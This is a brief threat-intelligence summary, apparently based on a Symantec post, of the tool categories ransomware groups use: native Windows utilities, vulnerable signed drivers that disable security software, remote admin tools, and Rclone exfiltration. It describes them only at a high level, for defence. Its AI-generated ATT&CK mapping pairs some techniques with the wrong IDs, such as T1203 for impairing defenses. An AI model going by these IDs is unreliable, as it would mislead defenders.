Short Summary:
The article discusses various tools and techniques used by attackers in the context of ransomware operations. It categorizes these tools into four main areas: Living off the Land, Impairing Defenses, Remote Desktop/Remote Admin, and Data Exfiltration. The article also highlights the growing robustness of the ransomware ecosystem and suggests visiting the Symantec Protection Bulletin for the latest protection updates.
Key Points:
- Living off the Land: Utilizes native Windows utilities like PsExec and WMI for lateral movement and command execution.
- Impairing Defenses: Attackers deploy signed vulnerable drivers to disable security software.
- Remote Desktop/Remote Admin: Legitimate tools like RDP and AnyDesk are exploited for backdoor access.
- Data Exfiltration: Ransomware groups often steal data before encryption, using tools like Rclone.
- Robust Ecosystem: The rise of new ransomware operations may lead to a more resilient ecosystem.
- Protection/Mitigation: For updates on protection measures, refer to the Symantec Protection Bulletin.
MITRE ATT&CK TTPs – created by AI
- Living off the Land (T1218)
- Use of native Windows utilities such as PsExec and WMI for lateral movement.
- PowerShell for executing commands and reconnaissance.
- Impairing Defenses (T1203)
- Deployment of signed vulnerable drivers to disable security software.
- Remote Access Tools (T1219)
- Exploitation of RDP, AnyDesk, and similar tools for backdoor access.
- Data Exfiltration (T1041)
- Use of Rclone and other tools for data theft prior to encryption.
These tools fall mostly into four categories:
Living off the Land: Utilities that are native to the Windows environment that can be leveraged by an attacker. Tools such as PsExec and WMI can be leveraged by attackers to move laterally on networks and execute commands on remote machines. PowerShell, meanwhile, is a powerful scripting tool that can be used to run commands, download payloads, move laterally, and carry out reconnaissance.
Impairing Defenses: A growing number of attackers are using tools that leverage the Bring Your Own Vulnerable Driver (BYOD) technique. Attackers will deploy a signed vulnerable driver to the target network and use that driver to kill security software. Drivers are given kernel access, which means that they can be used to kill processes. In most cases, the vulnerable driver is deployed along with a malicious executable, which will use the driver to issue commands.
Remote Desktop/Remote Admin: While these software packages are used legitimately for remote administration or tech support, attackers are turning to them because they effectively provide backdoor access to a machine. Tools such as RDP, AnyDesk, Splashtop, and ScreenConnect are frequently deployed by ransomware actors.
Data Exfiltration: Most ransomware groups carry out double-extortion attacks, stealing data from a victim’s network prior to encryption and using the threat of leaking that stolen data as an additional form of leverage. Rclone is the most frequently used exfiltration tool. Many of the remote admin packages used by ransomware actors also have exfiltration capabilities.
Robust ecosystem
The growth of ransomware operations such as RansomHub and Qilin to rival LockBit isn’t welcome news, as it may make the ransomware ecosystem more robust and less likely to experience major disruption should a dominant operator be taken down or go offline.
Protection/Mitigation
For the latest protection updates, please visit the Symantec Protection Bulletin.
Source: Original Post